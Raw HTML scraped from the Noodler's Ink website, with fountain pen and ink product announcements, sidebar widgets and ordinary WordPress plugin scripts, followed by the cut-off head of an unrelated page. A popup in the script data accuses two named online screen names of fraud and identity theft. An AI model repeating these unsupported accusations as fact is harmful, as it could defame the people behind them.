http://noodlersink.com/wp-content/uploads/2015/12/Noodlers-New-1820-Essex.jpg 1024w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/new-konrad-colors-coming-soon/">New Konrad</a></h2><p>The New Noodler's Konrad Colors are Coming Soon! Beautiful new colors! Durable, yet biodegradable plastic. Noodler's flex nib you love, all in one amazing fountain pen. &#x02026; <a href="http://noodlersink.com/general/new-konrad-colors-coming-soon/" class="more-link">[Read More...]</a></p></div><div class="post-1550 post type-post status-publish format-standard has-post-thumbnail hentry category-general category-whats-new category-writing-instruments entry"><a href="http://noodlersink.com/general/new-acrylic-konrads/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/2015/11/WendigoJerseyNantucket-nib-up-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/2015/11/WendigoJerseyNantucket-nib-up-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/2015/11/WendigoJerseyNantucket-nib-up-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/new-acrylic-konrads/">New Acrylic Konrad&#8217;s</a></h2><p>INTRODUCING THE NEW NANTUCKET CHIMNEY AFIRE STOCK # 14085 WENDIGO STOCK # 14086 JERSEY DEVIL STOCK# 14087 and TINIAN TREASURE STOCK #14088 &nbsp; KONRAD ACRYLIC FOUNTAIN PENS THE NOODLER'S ACRYLIC FOUNTAIN PENS COME WITH THE FINE/MEDIUM FLEX NIB. EACH PEN HAS THE NOODLER'S INK EBONITE FEED AND THE PISTON FILLING MECHANISM. THE BEAUTIFUL NEW ADDITIONS  TO THE KONRAD ACRYLIC COLLECTION ARE AVAILABLE THROUGH OUR AUTHORIZED DEALERS IN LATE NOVEMBER 2015. A LIST &#x02026; <a href="http://noodlersink.com/general/new-acrylic-konrads/" class="more-link">[Read More...]</a></p></div><div class="post-1455 post type-post status-publish format-standard hentry category-blog category-general category-whats-new entry has-post-thumbnail"><a href="http://noodlersink.com/general/1455/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/2015/04/president-tooth-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/1455/">The president&#8217;s collection</a></h2><p>The films are narrated by Mr. Reginald B. Hegarty, great uncle of Mr. Tardif The president’s scrimshander By PEGGI MEDEIROS | Published: NOVEMBER 1, 2013 | Leave a comment Milton K. Delano It arrived in New Bedford at some point in 1818. It was discovered in an old New Bedford house by a master artist. According to the New York Times on October 20, 1973, it was a bull whale. It took two hundred forty hours of etching, coloring and polishing to create a masterpiece. It measured a massive &#x02026; <a href="http://noodlersink.com/general/1455/" class="more-link">[Read More...]</a></p></div><div class="post-1425 post type-post status-publish format-standard hentry category-fountain-pen-ink category-general category-whats-new entry has-post-thumbnail"><a href="http://noodlersink.com/general/1425/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/2014/12/Noodlers-Smaller-Air-Corp-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/2014/12/Noodlers-Smaller-Air-Corp-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/2014/12/Noodlers-Smaller-Air-Corp-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/1425/">Noodler&#8217;s Ink Limited Edition Prints</a></h2><p>Noodler's Limited Edition Prints Beautiful 8.5 x 11 recreations of some of most famous Noodler's Ink labels can now be yours. Perfect for the shop, your art studio, your office or your home.  Each Limited Edition print is on heavy Oak-tag paper, signed, numbered and is a beautiful recreation of Black Swan in English Roses, Black Swan in Australian Roses, Bad Blue Heron, and Bad Black Moccasin, and now Upper Ganges, Air-Corp Blue-Black and Dragons Napalm.    Each print is in a series of 50 and &#x02026; <a href="http://noodlersink.com/general/1425/" class="more-link">[Read More...]</a></p></div><div class="post-1385 post type-post status-publish format-standard hentry category-general category-whats-new category-writing-instruments entry has-post-thumbnail"><a href="http://noodlersink.com/general/new-acrylic-neponsets/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/2014/12/acrylic-neponset-9marbled-marianas-nib-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/2014/12/acrylic-neponset-9marbled-marianas-nib-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/2014/12/acrylic-neponset-9marbled-marianas-nib-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/new-acrylic-neponsets/">New Acrylic Neponsets</a></h2><p>INTRODUCING THE NEW  ACRYLIC NEPONSET FOUNTAIN PEN   &nbsp; The New Acrylic Neponset fountain pen is visually stunning while offering a superb writing experience. The 3 tined music nibs has a velvety pen stroke with the ability to greatly vary the line width to the user's liking. The ink flow is consistent and generous from the three fissure ebonite music feed. The Neponset comes equipped with a piston fill mechanism. The Neponset comes with a three tined music nib, &#x02026; <a href="http://noodlersink.com/general/new-acrylic-neponsets/" class="more-link">[Read More...]</a></p></div><div class="post-1319 post type-post status-publish format-standard has-post-thumbnail hentry category-blog category-fountain-pen-ink category-general category-whats-new category-writing-instruments entry"><a href="http://noodlersink.com/general/noodlers-ink-neponset-fountain-pen/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/2014/10/Ebonite-neponset-Fanned-Out-Group-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/2014/10/Ebonite-neponset-Fanned-Out-Group-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/2014/10/Ebonite-neponset-Fanned-Out-Group-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/noodlers-ink-neponset-fountain-pen/">NOODLER&#8217;S INK EBONITE NEPONSET FOUNTAIN PEN</a></h2><p>THE  EBONITE NEPONSET HAS ARRIVED! &nbsp;    What is a Neponset?  It is so much more than a name. The Neponset is a glimpse back in time. A journey to an era of legacy’s, new beginnings and war heroes.  A time of ... &nbsp; &nbsp; The New England Airship company, later renamed the Dartmouth Airship Co.,  was the first of its kind in the United States. The year was 1929, a challenging time for our country.  Soon after, Nathan’s grandfather became CEO and one &#x02026; <a href="http://noodlersink.com/general/noodlers-ink-neponset-fountain-pen/" class="more-link">[Read More...]</a></p></div></div></div> </div><!-- end #content --> <div id="sidebar" class="sidebar widget-area"><div id="search-3" class="widget widget_search"><div class="widget-wrap"><form method="get" class="searchform search-form" action="http://noodlersink.com/" role="search" ><input type="text" value="Search this website &#x02026;" name="s" class="s search-input" onfocus="if ('Search this website &#x2026;' === this.value) {this.value = '';}" onblur="if ('' === this.value) {this.value = 'Search this website &#x2026;';}" /><input type="submit" class="searchsubmit search-submit" value="Search" /></form></div></div> <div id="enews-ext-2" class="widget enews-widget"><div class="widget-wrap"><div class="enews"><h4 class="widget-title widgettitle">Sign up for our newsletter</h4> <p>Get new product updates and announcements sent to your email box.</p> <form id="subscribe-enews-ext-2" action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open( 'http://feedburner.google.com/fb/a/mailverify?uri=NoodlersInk', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true" name="enews-ext-2"> <label for="subbox" class="screenread">E-Mail Address</label><input type="text" value="" id="subbox" placeholder="E-Mail Address" name="email" /> <input type="hidden" name="uri" value="NoodlersInk" /> <input type="hidden" name="loc" value="en_US" /> <input type="submit" value="Go" id="subbutton" /> </form> </div></div></div> <div id="featured-post-3" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">What&#8217;s New</h4> <div class="post-2175 post type-post status-publish format-standard hentry category-fountain-pen-ink category-general category-whats-new entry has-post-thumbnail"><a href="http://noodlersink.com/general/more-new-inks/" class="alignright" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/19094-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/19094-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/19094-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/more-new-inks/">MORE NEW INKS!</a></h2><p>THE RUSSIAN SERIES EXPANDS!   TO LEARN MORE GO TO THE INK COLORS AND PROPERTIES PAGE! COMING SOON TO AN AUTHORIZED DEALER NEAR YOU! &#x02026; <a href="http://noodlersink.com/general/more-new-inks/" class="more-link">[More...]</a></p></div><div class="post-2146 post type-post status-publish format-standard hentry category-fountain-pen-ink category-general category-whats-new category-writing-instruments entry"><h2 class="entry-title"><a href="http://noodlersink.com/general/boston-safety-pen/">Boston Safety Pen</a></h2><p>https://youtu.be/RhGU3QQynBQ &#x02026; <a href="http://noodlersink.com/general/boston-safety-pen/" class="more-link">[More...]</a></p></div><h4 class="widget-title widgettitle"><span class="more-posts-title">Other New Inks</span></h4> <ul class="more-posts"><li><a href="http://noodlersink.com/general/newnewnewnewnewnew/">NEW*NEW*NEW*NEW*NEW*NEW*</a></li><li><a href="http://noodlersink.com/whats-new/kung-te-cheng/">Kung Te-cheng</a></li><li><a href="http://noodlersink.com/whats-new/ink/">WHAT IS NEW WITH NOODLER&#8217;S INK!</a></li><li><a href="http://noodlersink.com/general/2070/"></a></li></ul><p class="more-from-category"><a href="http://noodlersink.com/category/whats-new/" title="What&#039;s New">View All New Items</a></p></div></div> <div id="text-4" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><object><param name="movie" value="http://www.youtube.com/v/AUt70GvP9DM?fs=1&amp;hl=en_US"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/AUt70GvP9DM?fs=1&amp;hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true"></embed></object></div> </div></div> <div id="text-3" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><div align=center> <img src=http://noodlersink.com/wp-content/uploads/2016/01/luxurybrandslogo.jpg width=292 /><br /> <strong><br /> Luxury Brands<br /> Troutman, NC 28166<br /> Phone: 980-276-0020<br /> Fax: (469) 533-0377<br /> </strong></div> </div> </div></div> <div id="text-14" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><div style="text-align:center;"> <a href="http://#ppsShowPopUp_100"><img src="http://noodlersink.com/wp-content/uploads/warning.png" /></a><br /> click for details</div> </div> </div></div> </div> </div><!-- end #content-sidebar-wrap --> </div><div id="footer" class="footer"><div class="wrap"><div class="gototop"> <p><a href="#wrap" rel="nofollow">Return to top of page</a></p> </div> <div class="creds"> <p>Copyright &copy; 2019 &middot; Luxury Brands &middot; All Rights Reserved &middot; by: jp <a href="http://jamespepe.com" title="Web Design + SEO">Nashville SEO</a> &middot; <a href="http://jamespepe.com" title="Web Design + SEO">WordPress Website Design</a> &middot; <a href="http://noodlersink.com/wp-login.php">Log in</a></p> </div> </div></div><div align=center><span class="scauto-footer"><small> <a href="/site-map/">Sitemap</a> - <a href="/privacy-policy/" rel="nofollow">Privacy Policy</a></small></span></div></div><link rel='stylesheet' id='frontend.popup-css' href='http://noodlersink.com/wp-content/plugins/popup-by-supsystic/modules/popup/css/frontend.popup.min.css?ver=1.9.46' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/noodlersink.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='http://noodlersink.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='http://noodlersink.com/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script> <script type='text/javascript' src='http://noodlersink.com/wp-content/themes/genesis/lib/js/menu/superfish.min.js?ver=1.7.10'></script> <script type='text/javascript' src='http://noodlersink.com/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js?ver=2.9.1'></script> <script type='text/javascript' src='http://noodlersink.com/wp-content/themes/genesis/lib/js/menu/superfish.compat.min.js?ver=2.9.1'></script> <script type='text/javascript' src='http://noodlersink.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript' src='http://noodlersink.com/wp-content/plugins/popup-by-supsystic/js/common.min.js?ver=1.9.46'></script> <script type='text/javascript'> /* <![CDATA[ */ var PPS_DATA = {"siteUrl":"http:\/\/noodlersink.com\/","imgPath":"http:\/\/noodlersink.com\/wp-content\/plugins\/popup-by-supsystic\/img\/","cssPath":"http:\/\/noodlersink.com\/wp-content\/plugins\/popup-by-supsystic\/css\/","loader":"http:\/\/noodlersink.com\/wp-content\/plugins\/popup-by-supsystic\/img\/loading.gif","close":"http:\/\/noodlersink.com\/wp-content\/plugins\/popup-by-supsystic\/img\/cross.gif","ajaxurl":"http:\/\/noodlersink.com\/wp-admin\/admin-ajax.php","options":{"add_love_link":"0","disable_autosave":"0","love_link_html":"<a title=\"WordPress PopUp Plugin\" style=\"color: #26bfc1 !important; font-size: 9px; position: absolute; bottom: 15px; right: 15px;\" href=\"https:\/\/supsystic.com\/plugins\/popup-plugin\/?utm_source=plugin&utm_medium=love_link&utm_campaign=popup\" target=\"_blank\">WordPress PopUp Plugin<\/a>"},"PPS_CODE":"pps","jsPath":"http:\/\/noodlersink.com\/wp-content\/plugins\/popup-by-supsystic\/js\/"}; /* ]]> */ </script> <script type='text/javascript' src='http://noodlersink.com/wp-content/plugins/popup-by-supsystic/js/core.min.js?ver=1.9.46'></script> <script type='text/javascript'> /* <![CDATA[ */ var ppsPopupsFromFooter = [{"id":"100","label":"WARNING!","active":"1","original_id":"38","params":{"main":{"show_on_page_load_delay":"","show_on":"click_on_element","show_on_click_on_el_delay":"0","show_on_scroll_window_delay":"0","show_on_scroll_window_perc_scroll":"0","show_on_link_follow_delay":"0","close_on":"user_close","show_pages":"all","show_time_from":"12:00am","show_time_to":"12:00am","show_date_from":"","show_date_to":"","show_to":"everyone","show_to_first_time_visit_days":"30","show_to_until_make_action_days":"30","count_times_num":"1","count_times_mes":"day","hide_for_devices_show":"0","hide_for_post_types_show":"0","hide_for_ips_show":"0","hide_for_ips":"","hide_for_countries_show":"0","hide_for_languages_show":"0","hide_search_engines_show":"0","hide_preg_url_show":"0","hide_preg_url":"","hide_for_user_roles_show":"0"},"tpl":{"width":"600","width_measure":"px","bg_overlay_opacity":"1","bg_overlay_type":"color","bg_overlay_color":"#000","bg_overlay_img":"","bg_overlay_img_pos":"stretch","bg_type_0":"color","bg_img_0":"","bg_color_0":"#ffffff","font_label":"default","label_font_color":"#c6c3c3","font_txt_0":"default","text_font_color_0":"#c6c3c3","font_footer":"default","footer_font_color":"#c6c3c3","responsive_mode":"width_only","reidrect_on_close":"","close_btn":"none","layered_pos":"","enb_label":"1","label":"WARNING!","enb_txt_0":"1","enb_btn_0":"1","btn_txt_0":"Click to Close","btn_url_0":"#","is_close_btn_0":"1","anim_key":"none","anim_duration":1000,"stat_ga_code":"","txt_0":"<p>The online screen names \"chemyst\" and \"South_Dartmouth_Inks\" belong to a known con-artist and repeat offender of both US Federal Trademark laws and laws against impersonation. This identity thief has repeatedly claimed and\/or built \"confidence\" among some online readers to be the founder of Noodler\u2019s Ink. Please be aware that the real founder of Noodler's Ink has not had time to actively post online since 2005 (with the exception of his youtube channel directly linked multiple times on this site) and that if you witness an individual posting daily if not hourly claiming to be the Noodler\u2019s Ink founder \u2013 such posts are fictitious and are intended to spread misinformation and criminal libel against Noodler's Ink.<\/p>\n<br>","sub_fields":{"email":{"label":"E-Mail","html":"text","enb":true,"mandatory":true,"name":"email"},"name":{"label":"Name","html":"text","enb":false,"name":"name"}},"reg_fields":{"name":{"label":"Name","html":"text","enb":1,"name":"name"},"email":{"label":"E-Mail","html":"text","enb":true,"mandatory":true,"name":"email"}}},"opts_attrs":{"bg_number":"1","txt_block_number":"1","btns_number":"1"}},"img_preview":"clear-popup.jpg","show_on":"3","show_to":"1","show_pages":"1","type_id":"8","views":"10874","unique_views":"1","actions":"1","date_created":"2015-01-10 18:59:43","sort_order":"0","show_in_admin_area":"0","img_preview_url":"http:\/\/supsystic-42d7.kxcdn.com\/_assets\/popup\/img\/preview\/clear-popup.jpg","view_id":"100_230895","type":"full_screen","show_pages_list":[],"show_categories_list":[],"rendered_html":"<span style=\"display: none;\" id=\"ppsPopupStylesHidden_100_230895\">#ppsPopupShell_100_230895 {\n\twidth: 600px;\n \tpadding: 15px;\n \tfont-family: \"Open Sans\",arial;\n\tfont-size: 16px;\n\tline-height: 1.475;\n\tfont-weight: normal;\n\tcolor: #fff;\n \ttext-shadow: 1px 1px 1px #000000;\n \ttext-align: center;\n}\n#ppsPopupShell_100_230895, #ppsPopupShell_100_230895 * {\n\t-webkit-box-sizing: content-box;\n\t-moz-box-sizing: content-box;\n\tbox-sizing: content-box;\n}\n#ppsPopupShell_100_230895 .ppsInnerTblContent {\n\tbackground-color: transparent;\n}\n#ppsPopupShell_100_230895 .ppsPopupLabel {\n\tfont-size: 32px;\n}\n#ppsPopupShell_100_230895 .ppsPopupClose {\n\tbackground-repeat: no-repeat;\n \tcursor: pointer;\n}\n#ppsPopupShell_100_230895 .ppsPopupClose:hover {\n\topacity: 0.8;\n}\n#ppsPopupShell_100_230895 .ppsBtn {\n \tdisplay: inline;\n \tmargin: 0;\n \tpadding: 5px 20px;\n \tborder-radius: 5px;\n \ttransition-duration: 0.3s;\n \ttext-decoration: none !important;\n \tcolor: #fff;\n \tfont-size: 24px;\n \tborder: 1px solid #000;\n \tcolor: #000;\n \t\tbackground: #ffffff; \/* Old browsers *\/\nbackground: -moz-linear-gradient(top, #ffffff 0%, #ffffff 100%); \/* FF3.6-15 *\/\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#ffffff 100%); \/* Chrome10-25,Safari5.1-6 *\/\nbackground: linear-gradient(to bottom, #ffffff 0%,#ffffff 100%); \/* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ *\/\nfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr=' #ffffff', endColorstr='#ffffff',GradientType=0 ); \/* IE6-9 *\/\n \t}\n#ppsPopupShell_100_230895 .ppsBtn:hover,\n#ppsPopupShell_100_230895 .ppsBtn:active {\n\t\t\/* Permalink - use to edit and share this gradient: http:\/\/colorzilla.com\/gradient-editor\/ #ffffff+0,7db9e8+100 *\/\nbackground: #cdcdcd; \/* Old browsers *\/\nbackground: -moz-linear-gradient(top, #ffffff 0%, #cdcdcd 100%); \/* FF3.6-15 *\/\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#cdcdcd 100%); \/* Chrome10-25,Safari5.1-6 *\/\nbackground: linear-gradient(to bottom, #ffffff 0%,#cdcdcd 100%); \/* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ *\/\nfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr=' #ffffff', endColorstr='#cdcdcd',GradientType=0 ); \/* IE6-9 *\/\n \t}\n#ppsPopupShell_100_230895 .ppsPopupClose {\n\tdisplay: inline !important;\n}#ppsPopupShell_100_230895 .ppsPopupClose { display: none; }<\/span><div id=\"ppsPopupShell_100_230895\" class=\"ppsPopupShell ppsPopupListsShell\">\n\t<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_none\"><\/a>\n\t<div class=\"ppsInnerTblContent\">\n\t\t\t\t\t<div class=\"ppsPopupLabel\">WARNING!<\/div>\n\t\t\t\t\t\t\t<div class=\"ppsPopupTxt ppsPopupTxt_0\"><p>The online screen names \"chemyst\" and \"South_Dartmouth_Inks\" belong to a known con-artist and repeat offender of both US Federal Trademark laws and laws against impersonation. This identity thief has repeatedly claimed and\/or built \"confidence\" among some online readers to be the founder of Noodler\u2019s Ink. Please be aware that the real founder of Noodler's Ink has not had time to actively post online since 2005 (with the exception of his youtube channel directly linked multiple times on this site) and that if you witness an individual posting daily if not hourly claiming to be the Noodler\u2019s Ink founder \u2013 such posts are fictitious and are intended to spread misinformation and criminal libel against Noodler's Ink.<\/p>\n<br><\/div>\n\t\t\t\t \t\t<a class=\"ppsBtn ppsBtn_0 ppsPopupClose\" href=\"#\">Click to Close<\/a>\n \t\t<\/div>\n<\/div>","connect_hash":"e566c4869ba36dfc3e620aec04c51b7a"}]; /* ]]> */ </script> <script type='text/javascript' src='http://noodlersink.com/wp-content/plugins/popup-by-supsystic/modules/popup/js/frontend.popup.min.js?ver=1.9.46'></script> <script type='text/javascript'> /* <![CDATA[ */ var ppsPopupsFromFooter = [{"id":"100","label":"WARNING!","active":"1","original_id":"38","params":{"main":{"show_on_page_load_delay":"","show_on":"click_on_element","show_on_click_on_el_delay":"0","show_on_scroll_window_delay":"0","show_on_scroll_window_perc_scroll":"0","show_on_link_follow_delay":"0","close_on":"user_close","show_pages":"all","show_time_from":"12:00am","show_time_to":"12:00am","show_date_from":"","show_date_to":"","show_to":"everyone","show_to_first_time_visit_days":"30","show_to_until_make_action_days":"30","count_times_num":"1","count_times_mes":"day","hide_for_devices_show":"0","hide_for_post_types_show":"0","hide_for_ips_show":"0","hide_for_ips":"","hide_for_countries_show":"0","hide_for_languages_show":"0","hide_search_engines_show":"0","hide_preg_url_show":"0","hide_preg_url":"","hide_for_user_roles_show":"0"},"tpl":{"width":"600","width_measure":"px","bg_overlay_opacity":"1","bg_overlay_type":"color","bg_overlay_color":"#000","bg_overlay_img":"","bg_overlay_img_pos":"stretch","bg_type_0":"color","bg_img_0":"","bg_color_0":"#ffffff","font_label":"default","label_font_color":"#c6c3c3","font_txt_0":"default","text_font_color_0":"#c6c3c3","font_footer":"default","footer_font_color":"#c6c3c3","responsive_mode":"width_only","reidrect_on_close":"","close_btn":"none","layered_pos":"","enb_label":"1","label":"WARNING!","enb_txt_0":"1","enb_btn_0":"1","btn_txt_0":"Click to Close","btn_url_0":"#","is_close_btn_0":"1","anim_key":"none","anim_duration":1000,"stat_ga_code":"","txt_0":"<p>The online screen names \"chemyst\" and \"South_Dartmouth_Inks\" belong to a known con-artist and repeat offender of both US Federal Trademark laws and laws against impersonation. This identity thief has repeatedly claimed and\/or built \"confidence\" among some online readers to be the founder of Noodler\u2019s Ink. Please be aware that the real founder of Noodler's Ink has not had time to actively post online since 2005 (with the exception of his youtube channel directly linked multiple times on this site) and that if you witness an individual posting daily if not hourly claiming to be the Noodler\u2019s Ink founder \u2013 such posts are fictitious and are intended to spread misinformation and criminal libel against Noodler's Ink.<\/p>\n<br>","sub_fields":{"email":{"label":"E-Mail","html":"text","enb":true,"mandatory":true,"name":"email"},"name":{"label":"Name","html":"text","enb":false,"name":"name"}},"reg_fields":{"name":{"label":"Name","html":"text","enb":1,"name":"name"},"email":{"label":"E-Mail","html":"text","enb":true,"mandatory":true,"name":"email"}}},"opts_attrs":{"bg_number":"1","txt_block_number":"1","btns_number":"1"}},"img_preview":"clear-popup.jpg","show_on":"3","show_to":"1","show_pages":"1","type_id":"8","views":"10874","unique_views":"1","actions":"1","date_created":"2015-01-10 18:59:43","sort_order":"0","show_in_admin_area":"0","img_preview_url":"http:\/\/supsystic-42d7.kxcdn.com\/_assets\/popup\/img\/preview\/clear-popup.jpg","view_id":"100_771828","type":"full_screen","rendered_html":"<span style=\"display: none;\" id=\"ppsPopupStylesHidden_100_771828\">#ppsPopupShell_100_771828 {\n\twidth: 600px;\n \tpadding: 15px;\n \tfont-family: \"Open Sans\",arial;\n\tfont-size: 16px;\n\tline-height: 1.475;\n\tfont-weight: normal;\n\tcolor: #fff;\n \ttext-shadow: 1px 1px 1px #000000;\n \ttext-align: center;\n}\n#ppsPopupShell_100_771828, #ppsPopupShell_100_771828 * {\n\t-webkit-box-sizing: content-box;\n\t-moz-box-sizing: content-box;\n\tbox-sizing: content-box;\n}\n#ppsPopupShell_100_771828 .ppsInnerTblContent {\n\tbackground-color: transparent;\n}\n#ppsPopupShell_100_771828 .ppsPopupLabel {\n\tfont-size: 32px;\n}\n#ppsPopupShell_100_771828 .ppsPopupClose {\n\tbackground-repeat: no-repeat;\n \tcursor: pointer;\n}\n#ppsPopupShell_100_771828 .ppsPopupClose:hover {\n\topacity: 0.8;\n}\n#ppsPopupShell_100_771828 .ppsBtn {\n \tdisplay: inline;\n \tmargin: 0;\n \tpadding: 5px 20px;\n \tborder-radius: 5px;\n \ttransition-duration: 0.3s;\n \ttext-decoration: none !important;\n \tcolor: #fff;\n \tfont-size: 24px;\n \tborder: 1px solid #000;\n \tcolor: #000;\n \t\tbackground: #ffffff; \/* Old browsers *\/\nbackground: -moz-linear-gradient(top, #ffffff 0%, #ffffff 100%); \/* FF3.6-15 *\/\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#ffffff 100%); \/* Chrome10-25,Safari5.1-6 *\/\nbackground: linear-gradient(to bottom, #ffffff 0%,#ffffff 100%); \/* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ *\/\nfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr=' #ffffff', endColorstr='#ffffff',GradientType=0 ); \/* IE6-9 *\/\n \t}\n#ppsPopupShell_100_771828 .ppsBtn:hover,\n#ppsPopupShell_100_771828 .ppsBtn:active {\n\t\t\/* Permalink - use to edit and share this gradient: http:\/\/colorzilla.com\/gradient-editor\/ #ffffff+0,7db9e8+100 *\/\nbackground: #cdcdcd; \/* Old browsers *\/\nbackground: -moz-linear-gradient(top, #ffffff 0%, #cdcdcd 100%); \/* FF3.6-15 *\/\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#cdcdcd 100%); \/* Chrome10-25,Safari5.1-6 *\/\nbackground: linear-gradient(to bottom, #ffffff 0%,#cdcdcd 100%); \/* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ *\/\nfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr=' #ffffff', endColorstr='#cdcdcd',GradientType=0 ); \/* IE6-9 *\/\n \t}\n#ppsPopupShell_100_771828 .ppsPopupClose {\n\tdisplay: inline !important;\n}#ppsPopupShell_100_771828 .ppsPopupClose { display: none; }<\/span><div id=\"ppsPopupShell_100_771828\" class=\"ppsPopupShell ppsPopupListsShell\">\n\t<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_none\"><\/a>\n\t<div class=\"ppsInnerTblContent\">\n\t\t\t\t\t<div class=\"ppsPopupLabel\">WARNING!<\/div>\n\t\t\t\t\t\t\t<div class=\"ppsPopupTxt ppsPopupTxt_0\"><p>The online screen names \"chemyst\" and \"South_Dartmouth_Inks\" belong to a known con-artist and repeat offender of both US Federal Trademark laws and laws against impersonation. This identity thief has repeatedly claimed and\/or built \"confidence\" among some online readers to be the founder of Noodler\u2019s Ink. Please be aware that the real founder of Noodler's Ink has not had time to actively post online since 2005 (with the exception of his youtube channel directly linked multiple times on this site) and that if you witness an individual posting daily if not hourly claiming to be the Noodler\u2019s Ink founder \u2013 such posts are fictitious and are intended to spread misinformation and criminal libel against Noodler's Ink.<\/p>\n<br><\/div>\n\t\t\t\t \t\t<a class=\"ppsBtn ppsBtn_0 ppsPopupClose\" href=\"#\">Click to Close<\/a>\n \t\t<\/div>\n<\/div>","connect_hash":"e566c4869ba36dfc3e620aec04c51b7a"}]; /* ]]> */ </script> <script type='text/javascript' src='http://noodlersink.com/wp-content/plugins/popup-by-supsystic/modules/popup/js/frontend.dummy.popup.js?ver=1.9.46'></script> </body></html>
0
<!DOCTYPE html> <!--[if IE 6]> <html id="ie6" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 7]> <html id="ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="pingback" href="" /> <!--[if lt IE 9]> <script src="https://canvasunplugged.com/wp-content/themes/Divi/js/html5.js" type="text/javascript"></script> <![endif]--> <script type="text/javascript"> document.documentElement.className = 'js'; </script> <script>var et_site_url='https://canvasunplugged.com';var et_post_id='336';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>Coming Soon Signup - Canvas Unplugged - Home</title> <!-- This site is optimized with the Yoast SEO Premium plugin v6.1 - https://yoa.st/1yg?utm_content=6.1 --> <link rel="canonical" href="https://canvasunplugged.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Coming Soon Signup - Canvas Unplugged - Home" /> <meta property="og:url" content="https://canvasunplugged.com/" /> <meta property="og:site_name" content="Canvas Unplugged - Home" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Coming Soon Signup - Canvas Unplugged - Home" /> <meta name="twitter:site" content="@canvasunplugged" /> <meta name="twitter:creator" content="@canvasunplugged" /> <script 